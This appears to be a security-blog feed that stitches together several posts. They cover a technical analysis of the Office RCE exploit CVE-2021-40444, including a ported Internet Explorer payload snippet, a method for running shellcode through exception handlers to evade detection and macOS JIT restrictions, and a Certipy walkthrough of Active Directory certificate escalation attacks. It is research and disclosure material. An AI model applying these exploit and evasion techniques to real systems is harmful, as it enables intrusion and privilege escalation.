Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
Strange control.exe Execution with INF File in Command Line
Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
Strange rundll32.exe Execution with INF File in Command Line

Going back to ProcMon, I tried to see why the INF file wasn’t being executed. It looks like they were using another exploit to trigger execution of "control.exe".

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
".cpl" Used as a URL Protocol

The attackers were triggering the execution of a Control Panel Item. The command line for control.exe suggested they were using the ".cpl" file extension as a URL protocol and then used relative path escapes to trigger the INF file.

Why wasn’t my Calculator DLL being executed then? Entirely my mistake! I was executing the Word document from a nested directory, but the attackers were only spraying a few relative path escapes that never reached my user directory. This makes sense because this document is intended to be executed from a victim's Downloads folder, whereas I was hosting the file inside of a nested Documents directory.

I placed the Word document in my Downloads folder and… voila:

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
Calculator being Executed by Word Document

Reversing the Attacker's Payload

We have a working exploit! Now the next step to understanding the attack is to reverse engineer the attacker’s malicious JavaScript. If you recall, it was somewhat obfuscated. As someone with experience with JavaScript obfuscators, it didn’t seem like the attacker’s did too much, however.

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
Common JavaScript String Obfuscation Technique seen in Attacker's Code

A common pattern I see with attempts at string obfuscation in JavaScript is an array containing a bunch of strings and the rest of the code referencing strings through an unknown function which referenced that array.

In this case, we can see a string array named "a0_0x127f" which is referenced inside of the global function "a0_0x15ec". Looking at the rest of the JavaScript, we can see that several parts of it call this unknown function with an numerical index, suggesting that this function is used to retrieve a deobfuscated version of the string.

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
String Deobfuscation Script

This approach to string obfuscation is relatively easy to get past. I wrote a small script to find all calls to the encryption function, resolve what the string was, and replace the entire call with the real string. Instead of worrying about the mechanics of the deobfuscation function, we can just call into it like the real code does to retrieve the deobfuscated string.

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
Before String Deobfuscation
Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
After String Deobfuscation

This worked extremely well and we now have a relatively deobfuscated version of their script. The rest of the deobfuscation was just combining strings, getting rid of "indirect" calls to objects, and naming variables given their context. I can’t cover each step in detail because there were a lot of minor steps for this last part, but there was nothing especially notable. I tried naming the variables the best I could given the context around them and commented out what I thought was happening.

Let’s review what the script does.

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
Part #1 of Deobfuscated JavaScript: Create and Destroy an IFrame

In this first part, the attacker's created an iframe element, retrieved the ActiveX scripting interface for that iframe, and destroyed the iframe. Although the iframe has been destroyed, the ActiveX interface is still live and can be used to execute arbitrary HTML/JavaScript.

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
Part #2 of Deobfuscated JavaScript: Create Nested ActiveX HTML Documents

In this next part, the attackers used the destroyed iframe's ActiveX interface to create three nested HTML documents. I am not entirely sure what the purpose of these nested documents serves, because if the attackers only used the original ActiveX interface without any nesting, the exploit works fine.

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
Part #3 of Deobfuscated JavaScript: Create ActiveX Control and Trigger INF File

This final section is what performs the primary exploits.

The attackers make a request to the exploit CAB file ("ministry.cab") with an XMLHttpRequest. Next, the attackers create a new ActiveX Control object inside of the third nested HTML document created in the last step. The class ID and version of this ActiveX control are arbitrary and can be changed, but the important piece is that the ActiveX Control points at the previously requested CAB file. URLMON will automatically verify the signature of the ActiveX Control CAB file, which is when the malicious INF file is extracted into the user's temporary directory.

To trigger their malicious INF payload, the attackers use the ".cpl" file extension as a URL Protocol with a relative path escape in a new HTML document. This causes control.exe to start rundll32.exe, passing the INF file as the Control Panel Item to execute.

The fully deobfuscated and commented HTML/JS payload can be found here.

Overview of the Attack

We covered a significant amount in the previous sections, let's summarize the attack from start to finish:

  1. A victim opens the malicious Word document.
  2. Word loads the attacker's HTML page as an OLE object and executes the contained JavaScript.
  3. An IFrame is created and destroyed, but a reference to its ActiveX scripting surface remains.
  4. The CAB file is invoked by creating an ActiveX control for it.
  5. While the CAB file's signature is verified, the contained INF file is written to the user's Temp directory.
  6. Finally, the INF is invoked by using the ".cpl" extension as a URL protocol, using relative path escapes to reach the temporary directory.
Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit

Reversing Microsoft's Patch

When Microsoft released its advisory for this bug on September 7th, they had no patch! To save face, they claimed Windows Defender was a mitigation, but that was just a detection for the attacker's exploit. The underlying vulnerability was untouched.

It took them nearly a month from when the first known sample was uploaded to VirusTotal (August 19th) to finally fix the issue on September 14th with a Patch Tuesday update. Let’s take a look at the major changes in this patch.

A popular practice by security researchers is to find the differences in binaries that used to contain vulnerabilities with the patched binary equivalent. I updated my system but saved several DLL files from my unpatched machine. There are a couple of tools that are great for finding assembly-level differences between two similar binaries.

  1. BinDiff by Zynamics
  2. Diaphora by Joxean Koret

I went with Diaphora because it is more advanced than BinDiff and allows for easy pseudo-code level comparisons. The primary binaries I diff'd were:

  1. IEFRAME.dll - This is what executed the URL protocol for ".cpl".
  2. URLMON.dll - This is what had the CAB file extraction exploit.

Reversing Microsoft's Patch: IEFRAME

Once I diff’d the updated and unpatched binary, I found ~1000 total differences, but only ~30 major changes. One function that had heavy changes and was associated with the CPL exploit was _AttemptShellExecuteForHlinkNavigate.

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
Pseudocode Diff of _AttemptShellExecuteForHlinkNavigate

In the old version of IEFRAME, this function simply used ShellExecuteW to open the URL protocol with no verification. This is why the CPL file extension was processed as a URL protocol.

In the new version, they added a significant number of checks for the URL protocol. Let’s compare the differences.

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
Patched _AttemptShellExecuteForHlinkNavigate Pseudocode
Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
New IsValidSchemeName Function

In the patched version of _AttemptShellExecuteForHlinkNavigate, the primary addition that prevents the use of file extensions as URL Protocols is the call to IsValidSchemeName.

This function takes the URL Protocol that is being used (i.e ".cpl") and verifies that all characters in it are alphanumerical. For example, this exploit used the CPL file extension to trigger the INF file. With this patch, ".cpl" would fail the IsValidSchemeName function because it contains a period which is non-alphanumerical.

An important factor to note is that this patch for using file extensions as URL Protocols only applies to MSHTML. File extensions are still exposed for use in other attacks against ShellExecute, which is why I wouldn't be surprised if we saw similar techniques in future vulnerabilities.

Reversing Microsoft's Patch: URLMON

I performed the same patch diffing on URLMON and found a major change in catDirAndFile. This function was used during extraction to generate the output path for the INF file.

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
Patched catDirAndFile Pseudocode

The patch for the CAB extraction exploit was extremely simple. All Microsoft did was replace any instance of a forward slash with a backslash. This prevents the INF extraction exploit of the CAB file because backslashes are ignored for relative path escapes.

Abusing CVE-2021-40444 in Internet Explorer

Although Microsoft's advisory covers an attack scenario where this vulnerability is abused in Microsoft Office, could we exploit this bug in another context?

Since Microsoft Office uses the same engine Internet Explorer uses to display web pages, could CVE-2021-40444 be abused to gain remote code execution from a malicious page opened in IE? When I tried to visit the same payload used in the Word document, the exploit did not work "out of the box", specifically due to an error with the pop up blocker.

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
IE blocks .cpl popup

Although the CAB extraction exploit was successfully triggered, the attempt to launch the payload failed because Internet Explorer considered the ".cpl" exploit to be creating a pop up.

Fortunately, we can port the .cpl exploit to get around this pop up blocker relatively easily. Instead of creating a new page, we can simply redirect the current page to the ".cpl" URL.

function redirect() {
    //
    // Redirect current window without creating new one,
    // evading the IE pop up blocker.
    //
    window.location = ".cpl:../../../AppData/Local/Temp/Low/msword.inf";
    document.getElementById("status").innerHTML = "Done";
}

//
// Trigger in 500ms to give time for the .cab file to extract.
//
setTimeout(function() {
    redirect()
}, 500);
Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit

With the small addition of the redirect, CVE-2021-40444 works without issue in Internet Explorer. The complete code for this ported HTML/JS payload can be found here.

Conclusion

CVE-2021-40444 is in fact compromised of several vulnerabilities as we investigated in this blog post. Not only was there the initial step of extracting a malicious file to a predictable location through the CAB file exploit, but there was also the fact that URL Protocols could be file extensions.

In the latest patch, Word still executes pages with JavaScript if you use the MHTML protocol. What’s frightening to me is that the entire attack surface of Internet Explorer is exposed to attackers through Microsoft Word. That is a lot of legacy code. Time will tell what other vulnerabilities attacker's will abuse in Internet Explorer through Microsoft Office.

Abusing Exceptions for Code Execution, Part 1

14 February 2022 at 20:11
Abusing Exceptions for Code Execution, Part 1

A common offensive technique used by operators and malware developers alike has been to execute malicious code at runtime to avoid static detection. Often, methods of achieving runtime execution have focused on placing arbitrary code into executable memory that can then be executed.

In this article, we will explore a new approach to executing runtime code that does not rely on finding executable regions of memory, but instead relies on abusing existing trusted memory to execute arbitrary code.

Background

Some common methods of runtime execution include:

  1. Allocating executable memory at runtime.
  2. Abusing Windows Section objects.
  3. Abusing existing RWX (read/write/execute) regions of memory allocated by legitimate code.
  4. Loading legitimate binaries that include an RWX PE section that can be overwritten.

One common pattern in all these methods is that they have always had a heavy focus on placing arbitrary shellcode in executable regions of memory. Another technique that has not seen significant adoption in the malware community due to its technical complexity is Return-Oriented Programming (ROP).

As a brief summary, ROP is a common technique seen in memory corruption exploits where an attacker searches for “snippets of code” (gadgets) inside binaries that perform a desired instruction and soon after return to the caller. These “gadgets” can then be used in a chain to perform small operations that add up to a larger goal.

Although typically used for memory corruption exploits, there has been limited use in environments where attackers already have code execution. For example, in the Video Game Hacking industry, there have been open-source projects that allow cheaters to abuse ROP gadgets to execute simplified shellcode for the purposes of gaining an unfair advantage in a video game.

The greatest limitation with ROP for runtime execution however is that the instruction set of potential gadgets can be extremely limited and thus is challenging to port complex shellcode to.

As an attacker that already has execution in an environment, ROP is an inefficient method of performing arbitrary operations at runtime. For example, assume you are given the following assembly located in a legitimate binary:

imul eax, edx
add eax, edx
ret

Using ROP, an attacker could only abuse the add eax, edx instruction because any previous instructions are not followed by a return instruction.

On a broader scale, although legitimate binaries are filled with a variety of different instructions performing all-kinds of operations, the limitations of ROP prevent an attacker from using most of these legitimate instructions.

Continuing the example assembly provided, the reason an attacker could not abuse the initial imul eax, edx instruction without corrupting their output is because as soon as the imul instruction is executed, the execution flow of the program would simply continue to the next add eax, edx instruction.

Theory: Runtime Obfuscation

I propose a new method of abusing legitimate instructions already present in trusted code, Exception Oriented Programming. Exception Oriented Programming is the theory of chaining together instructions present in legitimate code and “stepping over” these instructions one-by-one using a single step exception to simulate the execution of arbitrary shellcode.

As a general method, the steps to performing Exception Oriented Programming given arbitrary shellcode are:

  1. Setup the environment such that the program can intercept single step exceptions.
  2. Split each assembly instruction in the arbitrary shellcode into their respective assembled bytes.
  3. For each instruction, find an instance of the assembled bytes present in any legitimate module and store the memory location of these legitimate instructions.
  4. Execute any code that will cause an exception that the exception handler created in Step 1 can intercept. This can be as simple as performing a call instruction on an int3 (0xCC) instruction.
  5. In the exception handler, set the single step flag and set the instruction pointer register to the location of the next legitimate instruction for that shellcode.
  6. Repeat Step 5 until all instructions of the shellcode are executed.

The largest benefit to this method is that Exception Oriented Programming has significantly less requirements than Return Oriented Programming for an attacker that already has execution capabilities.

Next, we will cover some practical implementations of this theory. Although the implementations you will see are operating system specific, the theory itself is not restricted to one operating system. Additionally, implementation suggestions will stick strictly to documented methods, however it may be possible to implement the theory via undocumented methods such as directly hooking ntdll!KiUserExceptionDispatcher.

Vectored Exception Handlers

In this section, we will explore how to use Vectored Exception Handlers (VEH) to implement the EOP theory. Vectored Exception Handlers are an extension to Structured Exception Handling on Windows and are not frame-based. VEH will be called for unhandled exceptions regardless of the exception's location.

The flow for the preparation stage of this implementation is as follows:

  1. The application will register a VEH via the AddVectoredExceptionHandler Windows API.
  2. The application will split each instruction of the given shellcode using any disassembler. For the example proof-of-concept, we will use the Zydis disassembler library.
  3. For each split instruction, the application will attempt to find an instance of that instruction present in the executable memory of any loaded modules. These memory locations will be stored for later use by the exception handler.
  4. The application will finish preparing by finding any instance of an int3 instruction (a single 0xCC byte). This instruction will be stored for use by the exception handler and is returned to the caller which will invoke the arbitrary shellcode.

Once the necessary memory locations have been found, the caller can invoke the arbitrary shellcode by executing the int3 instruction that was returned to them.

  1. Once the caller has invoked the int3 instruction, the exception handler will be called with the code STATUS_BREAKPOINT. The exception handler should determine if this exception is for executing arbitrary shellcode by comparing the exception address with the previously stored location of the int3 instruction.
  2. If the breakpoint is indeed for the arbitrary shellcode, then the exception handler should:
    1. Retrieve the list of legitimate instructions needed to simulate the arbitrary shellcode.
    2. Store these instructions in thread-local storage.
    3. Set the instruction pointer to the first legitimate instruction to execute.
    4. Set the Trap flag on the FLAGS register.
    5. Continue execution.
  3. The rest of the instructions will cause a STATUS_SINGLE_STEP exception. In these cases, the exception handler should:
    1. Retrieve the list of legitimate instructions to execute from the thread-local storage.
    2. Set the instruction pointer to the next legitimate instruction's memory location.
    3. If this instruction is not the last instruction to execute, set the Trap flag on the FLAGS register. Otherwise, do not set the Trap flag.
    4. Continue execution.

Assuming the shellcode ends with a return instruction, eventually the execution flow will be gracefully returned to the caller. A source code sample of Exception Oriented Programming through Vectored Exception Handlers is provided in a later section.

Structured Exception Handlers

Although Vectored Exception Handlers are great, they're not exactly stealthy. For example, an anti-virus could use user-mode hooks to detect when vectored exception handlers are registered. Obviously there are plenty of ways to bypass such mitigations, but if there are stealthier alternatives, why not give them a try?

One potential path I wanted to investigate for Exception Oriented Programming was using generic Structured Exception Handling (SEH). Given that VEH itself is an extension to SEH, why wouldn't frame-based SEH work too? Before we can dive into implementing Exception Oriented Programming with SEH, it's important to understand how SEH works.

void my_bad_code() {
    __try {
        __int3;
    } __except(EXCEPTION_EXECUTE_HANDLER) {
    	printf("Exception handler called!");
    }
}

Let's say you surround some code with a try/except SEH block. When an exception occurs in that code, how does the application know what exception handler to invoke?

Abusing Exceptions for Code Execution, Part 1
Exception Directory of ntdll.dll

Nowadays SEH exception handling information is compiled into the binary, specifically the exception directory, detailing what regions of code are protected by an exception handler. When an exception occurs, this table is enumerated during an "unwinding process", which checks if the code that caused the exception or any of the callers on the stack have an SEH exception handler.

An important principle of Exception Oriented Programming is that your exception handler must be able to catch exceptions in the legitimate code that is being abused. The problem with SEH? If a function is already protected by an SEH exception handler, then when an exception occurs, the exception may never reach the exception handler of the caller.

This presents a challenge for Exception Oriented Programming, how do you determine whether a given function is protected by an incompatible exception handler?

Fortunately, the mere presence of an exception handler does not mean a region of code cannot be used. Unless the function for some reason would create a single step exception during normal operation or the function has a "catch all" handler, we can still use code from many functions protected by an exception handler.

To determine if a region of memory is compatible with Exception Oriented Programing:

  1. Determine if the region of memory is registered as protected in the module's exception directory. This can be achieved by directly parsing the module or by using the function RtlLookupFunctionEntry, which searches for the exception directory entry for a given address.
  2. If the region of memory is not protected by an exception handler (aka RtlLookupFunctionEntry returns NULL), then you can use this region of memory with no problem.
  3. If the region of memory is protected by an exception handler, you must verify that the exception handler will not corrupt the stack. During the unwinding process, functions with an exception handler can define "unwind operations" to help clean up the stack from changes in the function's prolog. This can in turn corrupt the call stack when an exception is being handled.
    1. To avoid this problem, check if the unwind operations contains either the UWOP_ALLOC_LARGE operation or the UWOP_ALLOC_SMALL operation. These were found to cause direct corruption to the call stack during testing.

Once compatible instruction locations are found within legitimate modules, how do you actually perform the Exception Oriented Programming attack with SEH? It's surprisingly simple.

With SEH exception handling using a try except block, you can define both an exception filter and the handler itself. When an exception occurs in the protected try except block, the exception filter you define determines whether or not the exception should be passed to the handler itself. The filter is defined as a parameter to the __except block:

void my_bad_code() {
    __try {
        __int3;
    } __except(MyExceptionFilter()) {
    	printf("Exception handler called!");
    }
}

In the example above, the exception filter is the function MyExceptionFilter and the handler is the code that simply prints that it was called. When registering a vectored exception handler, the handler function must be of the prototype typedef LONG(NTAPI* ExceptionHandler_t)(PEXCEPTION_POINTERS ExceptionInfo).

It turns out that the prototype for exception filters is actually compatible with the prototype above. What does this mean? We can reuse the same exception handler we wrote for the VEH implementation of Exception Oriented Programming by using it as an exception filter.

void my_bad_code() {
    __try {
        __int3;
    } __except(VectoredExceptionHandler(GetExceptionInformation())) {
    	printf("Exception handler called!");
    }
}

In the code above, the vectored exception handler is invoked using the GetExceptionInformation macro, which provides the function the exception information structure it can both read and modify.

That's all that you need to do to get Exception Oriented Programming working with standard SEH! Besides ensuring that the instruction locations found are compatible, the vectored exception handler is directly compatible when used as an exception filter.

Why is standard SEH significantly better than using VEH for Exception Oriented Programming? SEH is built into the binary itself and is used legitimately everywhere. Unlike vectored exception handling, there is no global function to register your handler.

From the perspective of static detection, there are practically no indicators that a given SEH handler is used for Exception Oriented Programming. Although dynamic detection may be possible, it is significantly harder to implement compared to if you were using Vectored Exception Handlers.

Bypassing the macOS Hardened Runtime

Up to this point, the examples around abuse of the method have been largely around the Windows operating system. In this section, we will discuss how we can abuse Exception Oriented Programming to bypass security mitigations on macOS, specifically parts of the Hardened Runtime.

The macOS Hardened Runtime is intended to provide "runtime integrity of your software by preventing certain classes of exploits, like code injection, dynamically linked library (DLL) hijacking, and process memory space tampering".

One security mitigation imposed by the Hardened Runtime is the restriction of just-in-time (JIT) compilation. For app developers, these restrictions can be bypassed by adding entitlements to disable certain protections.

The com.apple.security.cs.allow-jit entitlement allows an application to allocate writable/executable (WX) pages by using the MAP_JIT flag. A second alternative, the com.apple.security.cs.allow-unsigned-executable-memory entitlement, allows the application to allocate WX pages without the need of the MAP_JIT flag. With Exception Oriented Programming however, an attacker can execute just-in-time shellcode without needing any entitlements.

The flow for the preparation stage of this implementation is as follows:

  1. The application will register a SIGTRAP signal handler using sigaction and the SA_SIGINFO flag.
  2. The application will split each instruction of the given shellcode using any disassembler. For the example proof-of-concept, we will use the Zydis disassembler library.
  3. For each split instruction, the application will attempt to find an instance of that instruction present in the executable memory of any loaded modules. Executable memory regions can be recursively enumerated using the mach_vm_region_recurse function. These memory locations will be stored for later use by the signal handler.
  4. The application will finish preparing by finding any instance of an int3 instruction (a single 0xCC byte). This instruction will be stored for use by the signal handler and is returned to the caller which will invoke the arbitrary shellcode.

Once the necessary memory locations have been found, the caller can invoke the arbitrary shellcode by executing the int3 instruction that was returned to them.

  1. Once the caller has invoked the int3 instruction, the signal handler will be called. The signal handler should determine if this exception is for executing arbitrary shellcode by comparing the fault address - 1 with the previously stored location of the int3 instruction. One must be subtracted from the fault address because in the SIGTRAP signal handler, the fault address points to the instruction pointer whereas we need the instruction that caused the exception.
  2. If the breakpoint is indeed for the arbitrary shellcode, then the signal handler should:
    1. Retrieve the list of legitimate instructions needed to simulate the arbitrary shellcode.
    2. Store these instructions in thread-local storage.
    3. Set the instruction pointer to the first legitimate instruction to execute.
    4. Set the Trap flag on the FLAGS register.
    5. Continue execution.
  3. The rest of the instructions will call the signal handler, however, unlike Vectored Exception handlers, there is no error code passed differentiating a breakpoint and a single step exception. The signal handler can determine if the exception is for a legitimate instruction being executed by checking its thread-local storage for the previously set context. In these cases, the signal handler should:
    1. Retrieve the list of legitimate instructions to execute from the thread-local storage.
    2. Set the instruction pointer to the next legitimate instruction's memory location.
    3. If this instruction is not the last instruction to execute, set the Trap flag on the FLAGS register. Otherwise, do not set the Trap flag.
    4. Continue execution.

Assuming the shellcode ends with a return instruction, eventually the execution flow will be gracefully returned to the caller.

Exception Oriented Programming highlights a fundamental design flaw with the JIT restrictions present in the Hardened Runtime. The JIT mitigation assumes that to execute code "just-in-time", an attacker must have access to a WX page. In reality, an attacker can abuse a large amount of the instructions already present in legitimate modules to execute their own malicious shellcode.

Proof of Concept

Both the Windows and macOS proof-of-concept utilities can be accessed at this repository.

Conclusion

As seen with the new methodology in this article, code execution can be achieved without the need of dedicated memory for that code. When considering future research into runtime code execution, it is more effective to look at execution from a high-level perspective, an objective of executing the operations in a piece of code, instead of focusing on the requirements of existing methodology.

In part 2 of this series, we will explore how Exception Oriented Programming expands the possibilities for buffer overflow exploitation on Windows. We'll explore how to evade Microsoft's ROP mitigations such as security cookies and SafeSEH for gaining code execution from common vulnerabilities. Make sure to follow my Twitter to be amongst the first to know when this article has been published!

Parallel Discovery

Recently, another researcher (@x86matthew) published an article describing a similar idea to Exception Oriented Programming, implemented using vectored exception handlers for x86.

Whenever my research leads me to some new methodology I consider innovative, one practice I take is to publish a SHA256 hash of the idea, such that in the future, I can prove that I discovered a certain idea at a certain point in time. Fortunately, I followed this practice for Exception Oriented Programming.

On February 3rd, 2021, I created a public gist of the follow SHA256 hash:

5169c2b0b13a9b713b3d388e61eb007672e2377afd53720a61231491a4b627f7

To prove that this hash is a representation of a message summarizing Exception Oriented Programming, here is the message you can take a SHA256 hash of and compare to the published one above.

Instead of allocating executable memory to execute shellcode, split the shellcode into individual instructions, find modules in memory that have the instruction bytes in an executable section, then single step over those instructions (changing the RIP to the next instruction and so on).

Since the core idea was published by Matthew, I wanted to share my additional research in this article around stealthier SEH exception handlers and how the impact is not only limited to Windows. In a future article, I plan on sharing my additional research on how this methodology can be applied on previously unexploitable buffer overflow vulnerabilities on Windows.

Object Overloading

15 February 2022 at 20:01
In this post we are going to look at one such technique that I thought was cool while playing around with the Windows Object Manager, and which should allow us to load an arbitrary DLL of our creation into a Windows process during initial execution, something that I've been calling "Object Overloading" for reasons which will hopefully become apparent in this post.

H1.Jack, The Game

15 February 2022 at 23:00

As crazy as it sounds, we’re releasing a casual free-to-play mobile auto-battler for Android and iOS. We’re not changing line of business - just having fun with computers!

We believe that the greatest learning lessons come from outside your comfort zone, so whether it is a security audit or a new side hustle we’re always challenging ourself to improve the craft.

During the fall of 2019, we embarked on a pretty ambitious goal despite the virtually zero experience in game design. We partnered with a small game studio that was just getting started and decided to combine forces to design and develop a casual mobile game set in the *cyber* space. After many prototypes and changes of direction, we spent a good portion of 2020 spare time to work on the core mechanics and graphics. Unfortunately, the limited time and budget further delayed beta testing and the final release. Making a game is no joke, especially when it is a combined side project for two thriving businesses.

Despite all, we’re happy to announce the release of H1.Jack for Android and iOS as a free-to-play with no advertisement. We hope you’ll enjoy the game in between your commutes and lunch breaks!

No malware included.

H1.Jack is a casual mobile auto-battler inspired by cyber security events. Start from the very bottom and spend your money and fame in gaining new techniques and exploits. Heartbleed or Shellshock won’t be enough!

H1jack Room

While playing, you might end up talking to John or Luca.

Luca&John H1jack

Our monsters are procedurally generated, meaning there will be tons of unique systems, apps, malware and bots to hack. Battle levels are also dynamically generated. If you want a sneak peek, check out the trailer:

Certipy 2.0: BloodHound, New Escalations, Shadow Credentials, Golden Certificates, and more!

19 February 2022 at 13:09

As the title states, the latest release of Certipy contains many new features, techniques and improvements. This blog post dives into the technical details of many of them.

Public Key Infrastructure can be difficult to set up. Users and administrators are often not fully aware of the implications of ticking a single checkbox — especially when that single checkbox is what (finally) made things work.

It’s been almost five months since the first release of Certipy. Back then, Certipy was just a small tool for abusing and enumerating Active Directory Certificate Services (AD CS) misconfigurations. Since then, our offensive team at Institut For Cyber Risk have come across many different AD CS environments during our engagements, which required new additions and features.

These have been implemented and Certipy 2.0 is now ready for public release.

BloodHound integration

One of the major new features of Certipy is BloodHound integration. The old version had a simple feature to find vulnerable certificate templates based on the current user’s group memberships. But as we’ll see in a bit, integrating with BloodHound is just better.

By default, the new version of Certipy will output the enumeration results in both BloodHound data as well as text- and JSON-format. I’ve often found myself running the tool multiple times because I wanted to view the output in a different format.

It is however possible to output only BloodHound data, JSON, or text by specifying one or more of the switches -bloodhound, -json, or -text, respectively.

The BloodHound data is saved as a ZIP-file that can be imported into the latest version of BloodHound (4.1.0 at the time of writing). Please note that Certipy uses BloodHound’s new format, introduced in version 4.

New edges and nodes means new queries. I have created the most important queries that Certipy supports. The queries can be found in the repository and imported into your own BloodHound setup.

Certipy’s BloodHound queries

The new version of Certipy can abuse all of the scenarios listed in the “Domain Escalation” category. Suppose we have taken over the domain user account JOHN. Let’s start with one of the first queries, “Shortest Paths to Misconfigured Certificate Templates from Owned Principals (ESC1)”.

Shortest Paths to Misconfigured Certificate Templates from Owned Principals (ESC1)

This is a fairly simple path. But as we go through the escalation queries, we might see why BloodHound is just better, as attack paths can be built, using the imported Certipy data.

Shortest Paths to Vulnerable Certificate Template Access Control from Owned Principals (ESC4)

New Escalation Techniques

The whitepaper “Certified Pre-Owned” lists 8 domain escalation techniques for misconfigurations in AD CS (ESC1-ESC8). Previously, only ESC1 and ESC6 were supported by Certipy, and ESC8 was supported by Impacket’s ntlmrelayx. While ESC1 and ESC8 are the vulnerabilities we’ve seen the most, we’ve also come across other misconfigurations, which is why I have implemented all of them, except for ESC5 which is too abstract.

As such, Certipy now supports abusing all of the escalation techniques listed in the queries.

ESC1 — Misconfigured Certificate Templates

Shortest Paths to Misconfigured Certificate Templates from Owned Principals (ESC1)

The most common misconfiguration we’ve seen during our engagements is ESC1. In essence, ESC1 is when a certificate template permits Client Authentication and allows the enrollee to supply an arbitrary Subject Alternative Name (SAN).

The previous release of Certipy had support for this technique as well, but the new version comes with improvements, and therefore, I will demonstrate all of the escalation techniques that the new version of Certipy supports.

For ESC1, we can just request a certificate based on the vulnerable certificate template and specify an arbitrary SAN with the -alt parameter.

A new feature of Certipy is that certificates and private keys are now stored in PKCS#12 format. This allows us to pack the certificate and private key together in a standardized format.

Another neat feature is that the auth command will try to retrieve the domain and username from the certificate for authentication.

In most cases, this will not work, usually because the domain name cannot be resolved. To work around this, all the necessary parameters can be specified on the command line if needed.

ESC2 — Misconfigured Certificate Templates

Shortest Paths to Misconfigured Certificate Templates from Owned Principals (ESC2)

ESC2 is when a certificate template can be used for any purpose. The whitepaper “Certified Pre-Owned” does not mention any specific domain escalation technique that works out of the box for ESC2. But since the certificate can be used for any purpose, it can be used for the same technique as with ESC3, which we’ll see below.

ESC3 — Misconfigured Enrollment Agent Templates

Shortest Paths to Enrollment Agent Templates from Owned Principals (ESC3)

ESC3 is when a certificate template specifies the Certificate Request Agent EKU (Enrollment Agent). This EKU can be used to request certificates on behalf of other users. As we can see in the path above, the ESC2 certificate template is vulnerable to ESC3 as well, since the ESC2 template can be used for any purpose.

First, let’s request a certificate based on ESC3.

With our new Certificate Request Agent certificate we can request certificates on behalf of other users by specifying the -on-behalf-of parameter along with our Certificate Request Agent certificate. The -on-behalf-of parameter value must be in the form of domain\user, and not the FQDN of the domain, i.e. corp rather than corp.local.

For good measure, here’s the same attack with the ESC2 certificate template.

ESC4 — Vulnerable Certificate Template Access Control

Shortest Paths to Vulnerable Certificate Template Access Control from Owned Principals (ESC4)

ESC4 is when a user has write privileges over a certificate template. This can for instance be abused to overwrite the configuration of the certificate template to make the template vulnerable to ESC1.

As we can see in the path above, only JOHNPC has these privileges, but our user JOHN has the new AddKeyCredentialLink edge to JOHNPC. Since this technique is related to certificates, I have implemented this attack as well, which is known as Shadow Credentials. Here’s a little sneak peak of Certipy’s shadow auto command to retrieve the NT hash of the victim.

We’ll go into more details about the technique later in this post, but for now, we just want the NT hash of JOHNPC.

The new version of Certipy can overwrite the configuration of a certificate template with a single command. By default, Certipy will overwrite the configuration to make it vulnerable to ESC1. We can also specify the -save-old parameter to save the old configuration, which will be useful for restoring the configuration after our attack. Be sure to do this, if using Certipy outside a test environment.

As we can see below, the new configuration will allow Authenticated Users full control over the certificate template. Moreover, the new template can be used for any purpose, and the enrollee supplies the SAN, meaning it’s vulnerable to ESC1.

When we’ve overwritten the configuration, we can simply request a certificate based on the ESC4 template as we would do with ESC1.

If we want to restore the configuration afterwards, we can just specify the path to the saved configuration with the -configuration parameter. You can also use this parameter to set custom configurations.

ESC5 — Vulnerable PKI Object Access Control

ESC5 is when objects outside of certificate templates and the certificate authority itself can have a security impact on the entire AD CS system, for instance the CA server’s AD computer object or the CA server’s RPC/DCOM server. This escalation technique has not been implemented in Certipy, because it’s too abstract. However, if the CA server is compromised, you can perform the ESC7 escalation.

ESC6 — EDITF_ATTRIBUTESUBJECTALTNAME2

Find Certificate Authorities with User Specified SAN (ESC6)

ESC6 is when the CA specifies the EDITF_ATTRIBUTESUBJECTALTNAME2 flag. In essence, this flag allows the enrollee to specify an arbitrary SAN on all certificates despite a certificate template’s configuration. In Certipy, this can be seen in the property “User Specified SAN” of the CA. If this property is not shown, it means that Certipy couldn’t get the security and configuration of the CA.

The attack is the same as ESC1, except that we can choose any certificate template that permits client authentication.

ESC7 — Vulnerable Certificate Authority Access Control

Shortest Paths to Vulnerable Certificate Authority Access Control from Owned Principals (ESC7)

ESC7 is when a user has the Manage CA or Manage Certificates access right on a CA. While there are no public techniques that can abuse only the Manage Certificates access right for domain privilege escalation, we can still use it to issue or deny pending certificate requests.

We’ve seen this misconfiguration on one of our engagements. The whitepaper mentions that this access right can be used to enable the EDITF_ATTRIBUTESUBJECTALTNAME2 flag to perform the ESC6 attack, but this will not have any effect until the CA service (CertSvc) is restarted. When a user has the Manage CA access right, the user is allowed to restart the service. However, it does not mean that the user can restart the service remotely and we were also not allowed to restart this service on our engagement.

In the following, I will explain a new technique I found that doesn’t require any service restarts or configuration changes.

In order for this technique to work, the user must also have the Manage Certificates access right, and the certificate template SubCA must be enabled. Fortunately, with our Manage CA access right, we can fulfill these prerequisites if needed.

If we don’t have the Manage Certificates access right, we can just add ourselves as a new “officer”. An officer is just the term for a user with the Manage Certificates access right, as per MS-CSRA 3.1.1.7.

After running a new Certipy enumeration with the find command, and importing the output into BloodHound, we should now see that JOHN has the Manage Certificates and Manage CA access right.

Shortest Paths to Vulnerable Certificate Authority Access Control from Owned Principals (ESC7)

